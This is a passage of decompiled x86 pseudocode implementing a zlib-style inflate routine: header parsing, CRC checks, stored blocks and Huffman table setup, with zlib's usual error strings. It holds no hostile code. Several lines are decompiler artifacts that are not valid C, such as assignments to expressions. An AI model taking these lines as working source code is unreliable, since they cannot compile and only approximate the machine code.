														_push(2);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x25) = __dl;
														_push( *(__edi + 0x18));
														__eax = E004102D0();
														__esp = __esp + 0xc;
														 *(__edi + 0x18) = __eax;
													}
													__edx = 0;
													 *__edi = 2;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													goto L48;
												} else {
													 *(__ecx + 0x18) = "unknown header flags set";
													 *__edi = 0x1d;
													goto L183;
												}
											} else {
												 *(__ecx + 0x18) = "unknown compression method";
												 *__edi = 0x1d;
												goto L183;
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x10;
												if(__esi < 0x10) {
													continue;
												} else {
													__ecx =  *(__esp + 0x48);
													goto L37;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 2:
										__eflags = __esi - 0x20;
										if(__esi >= 0x20) {
											L50:
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 4) = __edx;
											}
											__eflags =  *(__edi + 0x10) & 0x00000200;
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												__eax = __edx;
												 *(__esp + 0x1c) = __dl;
												__eax = __edx >> 8;
												 *(__esp + 0x1d) = __al;
												__edx = __edx >> 0x10;
												 *(__esp + 0x1e) = __al;
												__eax = __esp + 0x1c;
												_push(4);
												__eflags = __edx;
												_push(__eax);
												 *(__esp + 0x27) = __dl;
												_push( *(__edi + 0x18));
												__eax = E004102D0();
												__esp = __esp + 0xc;
												 *(__edi + 0x18) = __eax;
											}
											__edx = 0;
											 *__edi = 3;
											 *(__esp + 0x10) = 0;
											__esi = 0;
											goto L57;
										} else {
											while(1) {
												L48:
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x20;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L50;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 3:
										__eflags = __esi - 0x10;
										if(__esi >= 0x10) {
											L59:
											__ecx =  *(__edi + 0x20);
											__eflags = __ecx;
											if(__ecx != 0) {
												__eax = __dl & 0x000000ff;
												 *(__ecx + 8) = __dl & 0x000000ff;
												__ecx = __edx;
												__eax =  *(__edi + 0x20);
												__ecx = __edx >> 8;
												__eflags = __ecx;
												 *(0xc +  *(__edi + 0x20)) = __ecx;
											}
											__eflags =  *(__edi + 0x10) & 0x00000200;
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												 *(__esp + 0x1c) = __dl;
												__eax = __esp + 0x1c;
												_push(2);
												__eflags = __edx;
												_push(__eax);
												 *(__esp + 0x25) = __dl;
												_push( *(__edi + 0x18));
												__eax = E004102D0();
												__esp = __esp + 0xc;
												 *(__edi + 0x18) = __eax;
											}
											__edx = 0;
											 *__edi = 4;
											 *(__esp + 0x10) = 0;
											__esi = 0;
											__eflags = 0;
											goto L64;
										} else {
											while(1) {
												L57:
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x10;
												if(__esi < 0x10) {
													continue;
												} else {
													goto L59;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 4:
										L64:
										__eflags =  *(__edi + 0x10) & 0x00000400;
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x10) = 0;
											}
											goto L75;
										} else {
											__eflags = __esi - 0x10;
											if(__esi >= 0x10) {
												L68:
												__eax =  *(__edi + 0x20);
												 *(__edi + 0x40) = __edx;
												__eflags = __eax;
												if(__eax != 0) {
													 *(__eax + 0x14) = __edx;
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													 *(__esp + 0x1c) = __dl;
													__eax = __esp + 0x1c;
													_push(2);
													__eflags = __edx;
													_push(__eax);
													 *(__esp + 0x25) = __dl;
													_push( *(__edi + 0x18));
													__eax = E004102D0();
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
												}
												__ecx = 0;
												__esi = 0;
												 *(__esp + 0x10) = 0;
												L75:
												 *__edi = 5;
												goto L76;
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x10;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L68;
													}
													goto L370;
												}
												goto L103;
											}
										}
										goto L370;
									case 5:
										L76:
										__eflags =  *(__edi + 0x10) & 0x00000400;
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											L90:
											 *(__edi + 0x40) = 0;
											 *__edi = 6;
											goto L91;
										} else {
											__ecx =  *(__edi + 0x40);
											 *(__esp + 0x34) = __ecx;
											__eflags = __ecx - __ebp;
											if(__ecx > __ebp) {
												__ecx = __ebp;
												 *(__esp + 0x34) = __ebp;
											}
											__eflags = __ecx;
											if(__ecx != 0) {
												__edx =  *(__edi + 0x20);
												__eflags = __edx;
												if(__edx != 0) {
													__eax =  *(__edx + 0x10);
													 *(__esp + 0x30) = __eax;
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *(__edx + 0x14);
														__eax =  *(__edx + 0x14) -  *(__edi + 0x40);
														__edx =  *(__edx + 0x18);
														 *(__esp + 0x38) = __eax;
														__eflags = __eax - __edx;
														__eax =  *(__esp + 0x38);
														if(__eflags <= 0) {
															__edx = __ecx;
														} else {
															__edx = __edx - __eax;
														}
														__eax = __eax +  *(__esp + 0x30);
														__eflags = __eax;
														__eax = memcpy(__eax, __ebx, __edx);
														__ecx =  *(__esp + 0x40);
														__esp = __esp + 0xc;
													}
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													_push(__ecx);
													_push(__ebx);
													_push( *(__edi + 0x18));
													__eax = E004102D0();
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
												}
												__eax =  *(__esp + 0x34);
												__ebx = __ebx + __eax;
												__ebp = __ebp - __eax;
												 *(__esp + 0x14) = __ebx;
												_t152 = __edi + 0x40;
												 *_t152 =  *(__edi + 0x40) - __eax;
												__eflags =  *_t152;
											}
											__eflags =  *(__edi + 0x40);
											if( *(__edi + 0x40) != 0) {
												goto L103;
											} else {
												goto L90;
											}
										}
										goto L370;
									case 6:
										L91:
										__eflags =  *(__edi + 0x10) & 0x00000800;
										if(( *(__edi + 0x10) & 0x00000800) == 0) {
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x1c) = 0;
											}
											goto L116;
										} else {
											__eflags = __ebp;
											if(__ebp == 0) {
												goto L103;
											} else {
												__ecx = 0;
												__eflags = 0;
												while(1) {
													__eax =  *(__ebx + __ecx) & 0x000000ff;
													__ecx = 1 + __ecx;
													 *(__esp + 0x34) = __eax;
													__eax =  *(__edi + 0x20);
													__eflags = __eax;
													if(__eax != 0) {
														__edx =  *(__eax + 0x1c);
														__eflags =  *(__eax + 0x1c);
														if( *(__eax + 0x1c) != 0) {
															__edx =  *(__edi + 0x40);
															__eflags = __edx -  *((intOrPtr*)(__eax + 0x20));
															if(__edx <  *((intOrPtr*)(__eax + 0x20))) {
																__eax =  *(__eax + 0x1c);
																__ebx =  *(__esp + 0x34);
																 *(__eax + __edx) = __bl;
																_t168 = __edi + 0x40;
																 *_t168 = 1 +  *(__edi + 0x40);
																__eflags =  *_t168;
																__ebx =  *(__esp + 0x14);
															}
														}
													}
													__eax =  *(__esp + 0x34);
													__eflags = __eax;
													if(__eax == 0) {
														break;
													}
													__eflags = __ecx - __ebp;
													if(__ecx < __ebp) {
														continue;
													}
													break;
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												 *(__esp + 0x38) = __ecx;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													_push(__ecx);
													_push(__ebx);
													_push( *(__edi + 0x18));
													__eax = E004102D0();
													__ecx =  *(__esp + 0x44);
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
													__eax =  *(__esp + 0x34);
												}
												__ebx = __ebx + __ecx;
												__ebp = __ebp - __ecx;
												 *(__esp + 0x14) = __ebx;
												__eflags = __eax;
												if(__eax == 0) {
													L116:
													 *(__edi + 0x40) = 0;
													 *__edi = 7;
													goto L117;
												} else {
													goto L103;
												}
											}
										}
										goto L370;
									case 7:
										L117:
										__eflags =  *(__edi + 0x10) & 0x00001000;
										if(( *(__edi + 0x10) & 0x00001000) == 0) {
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x24) = 0;
											}
											goto L132;
										} else {
											__eflags = __ebp;
											if(__ebp == 0) {
												goto L103;
											} else {
												__ecx = 0;
												__eflags = 0;
												while(1) {
													__eax =  *(__ebx + __ecx) & 0x000000ff;
													__ecx = 1 + __ecx;
													 *(__esp + 0x34) = __eax;
													__eax =  *(__edi + 0x20);
													__eflags = __eax;
													if(__eax != 0) {
														__edx =  *(__eax + 0x24);
														__eflags =  *(__eax + 0x24);
														if( *(__eax + 0x24) != 0) {
															__edx =  *(__edi + 0x40);
															__eflags = __edx -  *((intOrPtr*)(__eax + 0x28));
															if(__edx <  *((intOrPtr*)(__eax + 0x28))) {
																__eax =  *(__eax + 0x24);
																__ebx =  *(__esp + 0x34);
																 *(__eax + __edx) = __bl;
																_t213 = __edi + 0x40;
																 *_t213 = 1 +  *(__edi + 0x40);
																__eflags =  *_t213;
																__ebx =  *(__esp + 0x14);
															}
														}
													}
													__eax =  *(__esp + 0x34);
													__eflags = __eax;
													if(__eax == 0) {
														break;
													}
													__eflags = __ecx - __ebp;
													if(__ecx < __ebp) {
														continue;
													}
													break;
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												 *(__esp + 0x38) = __ecx;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													_push(__ecx);
													_push(__ebx);
													_push( *(__edi + 0x18));
													__eax = E004102D0();
													__ecx =  *(__esp + 0x44);
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
													__eax =  *(__esp + 0x34);
												}
												__ebx = __ebx + __ecx;
												__ebp = __ebp - __ecx;
												 *(__esp + 0x14) = __ebx;
												__eflags = __eax;
												if(__eax != 0) {
													goto L103;
												} else {
													L132:
													__edx =  *(__esp + 0x10);
													 *__edi = 8;
													goto L133;
												}
											}
										}
										goto L370;
									case 8:
										L133:
										__eflags =  *(__edi + 0x10) & 0x00000200;
										if(( *(__edi + 0x10) & 0x00000200) == 0) {
											L141:
											__ecx =  *(__edi + 0x20);
											__eflags = __ecx;
											if(__ecx != 0) {
												 *(__edi + 0x10) =  *(__edi + 0x10) >> 9;
												__eax =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
												__eflags = __eax;
												 *(__ecx + 0x2c) = __eax;
												__eax =  *(__edi + 0x20);
												 *( *(__edi + 0x20) + 0x30) = 1;
											}
											_push(0);
											_push(0);
											_push(0);
											__eax = E004102D0();
											__ecx =  *(__esp + 0x54);
											__esp = __esp + 0xc;
											__edx =  *(__esp + 0x10);
											 *(__edi + 0x18) = __eax;
											 *(__ecx + 0x30) = __eax;
											 *__edi = 0xb;
											goto L183;
										} else {
											__eflags = __esi - 0x10;
											if(__esi >= 0x10) {
												L138:
												__eax =  *(__edi + 0x18) & 0x0000ffff;
												__eflags = __edx - __eax;
												if(__edx == __eax) {
													__ecx = 0;
													__esi = 0;
													__eflags = 0;
													 *(__esp + 0x10) = 0;
													goto L141;
												} else {
													__ecx =  *(__esp + 0x48);
													 *(__ecx + 0x18) = "header crc mismatch";
													 *__edi = 0x1d;
												}
												goto L183;
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x10;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L138;
													}
													goto L370;
												}
												goto L103;
											}
										}
										goto L370;
									case 9:
										__eflags = __esi - 0x20;
										if(__esi >= 0x20) {
											L147:
											__ecx = __edx;
											__edx = __edx << 0x10;
											__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
											__edx = __edx >> 8;
											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
											__eax = __edx >> 0x00000008 & 0x0000ff00;
											__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
											__edx = __edx >> 0x18;
											__ecx =  *(__esp + 0x48);
											__eax = __eax + __edx;
											__edx = 0;
											 *(__edi + 0x18) = __eax;
											 *(__esp + 0x10) = 0;
											__esi = 0;
											__eflags = 0;
											 *(__ecx + 0x30) = __eax;
											 *__edi = 0xa;
											goto L148;
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x20;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L147;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0xa:
										L148:
										__eflags =  *(0xc + __edi);
										if( *(0xc + __edi) == 0) {
											__eax =  *(__esp + 0x24);
											 *(0xc + __ecx) =  *(__esp + 0x24);
											__eax =  *(__esp + 0x18);
											 *(__ecx + 0x10) =  *(__esp + 0x18);
											__eax = 2;
											 *__ecx = __ebx;
											 *(__ecx + 4) = __ebp;
											 *(__edi + 0x3c) = __esi;
											_pop(__esi);
											_pop(__ebp);
											_pop(__ebx);
											 *(__edi + 0x38) = __edx;
											return 2;
										} else {
											_push(0);
											_push(0);
											_push(0);
											__eax = E00410AD0();
											__ecx =  *(__esp + 0x54);
											__esp = __esp + 0xc;
											__edx =  *(__esp + 0x10);
											 *(__edi + 0x18) = __eax;
											 *(__ecx + 0x30) = __eax;
											 *__edi = 0xb;
											goto L150;
										}
										goto L370;
									case 0xb:
										L150:
										__eax =  *(__esp + 0x4c);
										__eflags = __eax - 5;
										if(__eax == 5) {
											L351:
											__edi =  *(__esp + 0x10);
											__edx = __eax;
											goto L105;
										} else {
											__eflags = __eax - 6;
											if(__eax == 6) {
												goto L351;
											} else {
												goto L152;
											}
										}
										goto L370;
									case 0xc:
										L152:
										__eflags =  *(__edi + 4);
										if( *(__edi + 4) == 0) {
											__eflags = __esi - 3;
											if(__esi >= 3) {
												L157:
												__eax = __edx;
												__edx = __edx >> 1;
												 *(__edi + 4) = __eax;
												__eax = __edx;
												__eax = __edx & 0x00000003;
												__eflags = __eax - 3;
												if(__eax > 3) {
													L160:
													__ecx =  *(__esp + 0x48);
													__edx = __edx >> 2;
													__esi = __esi - 3;
													 *(__esp + 0x10) = __edx;
													goto L183;
												} else {
													switch( *((intOrPtr*)(__eax * 4 +  &M0040FEBC))) {
														case 0:
															 *__edi = 0xd;
															goto L160;
														case 1:
															__eflags =  *(__esp + 0x4c) - 6;
															 *(__edi + 0x4c) = 0x412738;
															 *(__edi + 0x54) = 9;
															 *(__edi + 0x50) = 0x412f38;
															 *(__edi + 0x58) = 5;
															 *__edi = 0x13;
															if( *(__esp + 0x4c) != 6) {
																goto L160;
															} else {
																__edx = __edx >> 2;
																__esi = __esi - 3;
																 *(__esp + 0x10) = __edx;
																goto L103;
															}
															goto L370;
														case 2:
															_t274 = __esp + 0x48; // 0x9
															__ecx =  *_t274;
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *__edi = 0x10;
															 *(__esp + 0x10) = __edx;
															goto L183;
														case 3:
															_t276 = __esp + 0x48; // 0x9
															__ecx =  *_t276;
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *(__esp + 0x10) = __edx;
															 *(__ecx + 0x18) = "invalid block type";
															 *__edi = 0x1d;
															goto L183;
													}
												}
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 3;
													if(__esi < 3) {
														continue;
													} else {
														goto L157;
													}
													goto L370;
												}
												goto L103;
											}
										} else {
											__ecx = __esi;
											 *__edi = 0x1a;
											__ecx = __esi & 0x00000007;
											__edx = __edx >> __cl;
											__esi = __esi - __ecx;
											 *(__esp + 0x10) = __edx;
											goto L182;
										}
										goto L370;
									case 0xd:
										__esi = __esi & 0x00000007;
										__edx = __edx >> __cl;
										__esi = __esi - (__esi & 0x00000007);
										 *(__esp + 0x10) = __edx;
										__eflags = __esi - 0x20;
										if(__esi >= 0x20) {
											L169:
											__eax = __edx;
											__ecx = __edx;
											__eax =  !__edx;
											__ecx = __edx & 0x0000ffff;
											__eax =  !__edx >> 0x10;
											__eflags = __ecx - __eax;
											if(__ecx == __eax) {
												__edx = 0;
												 *(__edi + 0x40) = __ecx;
												__esi = 0;
												 *(__esp + 0x10) = 0;
												__eflags =  *(__esp + 0x4c) - 6;
												 *__edi = 0xe;
												if( *(__esp + 0x4c) == 6) {
													__edi = 0;
													goto L104;
												} else {
													__ecx =  *(__esp + 0x48);
													goto L173;
												}
											} else {
												__ecx =  *(__esp + 0x48);
												 *(__ecx + 0x18) = "invalid stored block lengths";
												 *__edi = 0x1d;
												goto L183;
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x20;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L169;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0xe:
										L173:
										 *__edi = 0xf;
										goto L174;
									case 0xf:
										L174:
										__eax =  *(__edi + 0x40);
										 *(__esp + 0x34) = __eax;
										__eflags = __eax;
										if(__eax == 0) {
											 *__edi = 0xb;
											goto L183;
										} else {
											__eflags = __eax - __ebp;
											if(__eax > __ebp) {
												__eax = __ebp;
												 *(__esp + 0x34) = __ebp;
											}
											__ecx =  *(__esp + 0x18);
											__eflags = __eax - __ecx;
											if(__eax > __ecx) {
												__eax = __ecx;
												 *(__esp + 0x34) = __eax;
											}
											__eflags = __eax;
											if(__eax == 0) {
												goto L103;
											} else {
												__eax = memcpy( *(__esp + 0x2c), __ebx, __eax);
												__eax =  *(__esp + 0x40);
												__esp = __esp + 0xc;
												 *(__esp + 0x18) =  *(__esp + 0x18) - __eax;
												__ebx = __ebx + __eax;
												 *(__esp + 0x24) =  *(__esp + 0x24) + __eax;
												__ebp = __ebp - __eax;
												_t299 = __edi + 0x40;
												 *_t299 =  *(__edi + 0x40) - __eax;
												__eflags =  *_t299;
												 *(__esp + 0x14) = __ebx;
												goto L181;
											}
										}
										goto L370;
									case 0x10:
										__eflags = __esi - 0xe;
										if(__esi >= 0xe) {
											L191:
											__eax = __edx;
											__esi = __esi - 0xe;
											__eax = __edx & 0x0000001f;
											__edx = __edx >> 5;
											 *(__edi + 0x60) = __eax;
											__eax = __edx;
											__eax = __edx & 0x0000001f;
											__edx = __edx >> 5;
											 *(__edi + 0x64) = __eax;
											__eax = __edx;
											__eax = __edx & 0x0000000f;
											__edx = __edx >> 4;
											__eax = __eax + 4;
											 *(__esp + 0x10) = __edx;
											__eflags =  *(__edi + 0x60) - 0x11e;
											 *(__edi + 0x5c) = __eax;
											if( *(__edi + 0x60) > 0x11e) {
												L204:
												 *(__ecx + 0x18) = "too many length or distance symbols";
												 *__edi = 0x1d;
												goto L183;
											} else {
												__eflags =  *(__edi + 0x64) - 0x1e;
												if( *(__edi + 0x64) > 0x1e) {
													goto L204;
												} else {
													 *(__edi + 0x68) = 0;
													 *__edi = 0x11;
													goto L194;
												}
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0xe;
												if(__esi < 0xe) {
													continue;
												} else {
													__ecx =  *(__esp + 0x48);
													goto L191;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0x11:
										L194:
										__eax =  *(__edi + 0x68);
										__eflags =  *(__edi + 0x68) -  *(__edi + 0x5c);
										if( *(__edi + 0x68) >=  *(__edi + 0x5c)) {
											L200:
											__eflags =  *(__edi + 0x68) - 0x13;
											while( *(__edi + 0x68) < 0x13) {
												__eax =  *(__edi + 0x68);
												__ecx = 0;
												__eax =  *(0x412fb8 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												 *((short*)(__edi + 0x70 + ( *(0x412fb8 +  *(__edi + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
												 *(__edi + 0x68) = 1 +  *(__edi + 0x68);
												__eflags =  *(__edi + 0x68) - 0x13;
											}
											__eax = __edi + 0x530;
											 *(__edi + 0x54) = 7;
											__ecx = __edi + 0x6c;
											 *(__edi + 0x4c) = __eax;
											 *(__edi + 0x6c) = __eax;
											__edx = __edi + 0x54;
											__edi + 0x2f0 = __edi + 0x70;
											__eax = E00410DF0(0, __edi + 0x70, 0x13, __edi + 0x6c, __edi + 0x54, __edi + 0x2f0);
											 *(__esp + 0x2c) = __eax;
											__eflags = __eax;
											if(__eax == 0) {
												 *(__edi + 0x68) = 0;
												 *__edi = 0x12;
												goto L206;
											} else {
												__ecx =  *(__esp + 0x48);
												__edx =  *(__esp + 0x10);
												 *(__ecx + 0x18) = "invalid code lengths set";
												 *__edi = 0x1d;
												goto L183;
											}
										} else {
											do {
												__eflags = __esi - 3;
												if(__esi >= 3) {
													goto L199;
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L103;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 3;
														if(__esi < 3) {
															continue;
														} else {
															goto L199;
														}
														goto L370;
													}
													goto L103;
												}
												goto L370;
												L199:
												__eax =  *(__edi + 0x68);
												__edx = __edx & 0x00000007;
												__edx = __edx >> 3;
												__esi = __esi - 3;
												 *(__esp + 0x10) = __edx;
												__eax =  *(0x412fb8 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												 *((short*)(__edi + 0x70 + ( *(0x412fb8 +  *(__edi + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
												 *(__edi + 0x68) = 1 +  *(__edi + 0x68);
												__eax =  *(__edi + 0x68);
												__eflags =  *(__edi + 0x68) -  *(__edi + 0x5c);
											} while ( *(__edi + 0x68) <  *(__edi + 0x5c));
											goto L200;
										}
										goto L370;
									case 0x12:
										L206:
										__eax =  *(__edi + 0x64);
										__ecx =  *(__edi + 0x68);
										__eax =  *(__edi + 0x64) +  *(__edi + 0x60);
										 *(__esp + 0x34) = __ecx;
										__eflags = __ecx - __eax;
										if(__ecx >= __eax) {
											L242:
											__eflags =  *__edi - 0x1d;
											if( *__edi == 0x1d) {
												L181:
												__edx =  *(__esp + 0x10);
												goto L182;
											} else {
												__eflags =  *((short*)(__edi + 0x270));
												if( *((short*)(__edi + 0x270)) != 0) {
													__eax = __edi + 0x530;
													 *(__edi + 0x54) = 9;
													__ecx = __edi + 0x6c;
													 *(__edi + 0x4c) = __eax;
													 *(__edi + 0x6c) = __eax;
													__edx = __edi + 0x54;
													__edi + 0x2f0 = __edi + 0x70;
													__eax = E00410DF0(1, __edi + 0x70,  *(__edi + 0x60), __edi + 0x6c, __edi + 0x54, __edi + 0x2f0);
													 *(__esp + 0x2c) = __eax;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__edi + 0x6c);
														__ecx = __edi + 0x6c;
														 *(__edi + 0x50) =  *(__edi + 0x6c);
														__edx = __edi + 0x58;
														__eax = __edi + 0x2f0;
														 *(__edi + 0x58) = 6;
														 *(__edi + 0x60) =  *(__edi + 0x60) + 0x38;
														__eax = __edi + ( *(__edi + 0x60) + 0x38) * 2;
														__eax = E00410DF0(2, __edi + ( *(__edi + 0x60) + 0x38) * 2,  *(__edi + 0x64), __edi + 0x6c, __edi + 0x58, __edi + 0x2f0);
														__edx = __eax;
														 *(__esp + 0x2c) = __edx;
														__eflags = __edx;
														if(__edx == 0) {
															__edx =  *(__esp + 0x4c);
															 *__edi = 0x13;
															__eflags =  *(__esp + 0x4c) - 6;
															if( *(__esp + 0x4c) == 6) {
																__edi =  *(__esp + 0x10);
																goto L105;
															} else {
																__edx =  *(__esp + 0x10);
																__ecx =  *(__esp + 0x48);
																goto L252;
															}
														} else {
															__ecx =  *(__esp + 0x48);
															__edx =  *(__esp + 0x10);
															 *(__ecx + 0x18) = "invalid distances set";
															 *__edi = 0x1d;
															goto L183;
														}
													} else {
														__ecx =  *(__esp + 0x48);
														__edx =  *(__esp + 0x10);
														 *(__ecx + 0x18) = "invalid literal/lengths set";
														 *__edi = 0x1d;
														goto L183;
													}
												} else {
													__ecx =  *(__esp + 0x48);
													__edx =  *(__esp + 0x10);
													 *(__ecx + 0x18) = "invalid code -- missing end-of-block";
													 *__edi = 0x1d;
													goto L183;
												}
											}
										} else {
											__edi =  *(__esp + 0x10);
											do {
												__eax =  *(__esp + 0x40);
												__edx = 1;
												__ecx =  *( *(__esp + 0x40));
												__eax =  *(__esp + 0x20);
												1 << __cl = (1 << __cl) - 1;
												__edx = (0x00000001 << __cl) - 0x00000001 & __edi;
												__eax =  *( *(__esp + 0x20) + 0x4c);
												__eax =  *( *( *(__esp + 0x20) + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __edi) * 4);
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x38) = __eax;
												__eflags = (__cl & 0x000000ff) - __esi;
												if((__cl & 0x000000ff) <= __esi) {
													L212:
													__eax = __eax >> 0x10;
													__eflags = __dx - 0x10;
													if(__eflags >= 0) {
														if(__eflags != 0) {
															__eflags =  *(__esp + 0x3a) - 0x11;
															__edx =  *(__esp + 0x10);
															__ecx = __ah & 0x000000ff;
															if( *(__esp + 0x3a) != 0x11) {
																__edi = __ecx + 7;
																 *(__esp + 0x38) = __ecx;
																__eflags = __esi - __edi;
																if(__esi >= __edi) {
																	L233:
																	__edx = __edx >> __cl;
																	__edx = __edx & 0x0000007f;
																	__eax = (__edx & 0x0000007f) + 0xb;
																	__edx = __edx >> 7;
																	__eflags = __edx;
																	 *(__esp + 0x30) = __eax;
																	__eax = 0xfffffff9;
																	goto L234;
																} else {
																	while(1) {
																		__eflags = __ebp;
																		if(__ebp == 0) {
																			goto L103;
																		}
																		__eax =  *__ebx & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebx & 0x000000ff) << __cl;
																		__ebx = __ebx + 1;
																		__edx = __edx + __eax;
																		 *(__esp + 0x14) = __ebx;
																		__esi = __esi + 8;
																		 *(__esp + 0x10) = __edx;
																		__ebp = __ebp - 1;
																		__eflags = __esi - __edi;
																		if(__esi < __edi) {
																			continue;
																		} else {
																			__ecx =  *(__esp + 0x38);
																			goto L233;
																		}
																		goto L370;
																	}
																	goto L103;
																}
															} else {
																__edi = __ecx + 3;
																 *(__esp + 0x38) = __ecx;
																__eflags = __esi - __edi;
																if(__esi >= __edi) {
																	L227:
																	__edx = __edx >> __cl;
																	__edx = __edx & 0x00000007;
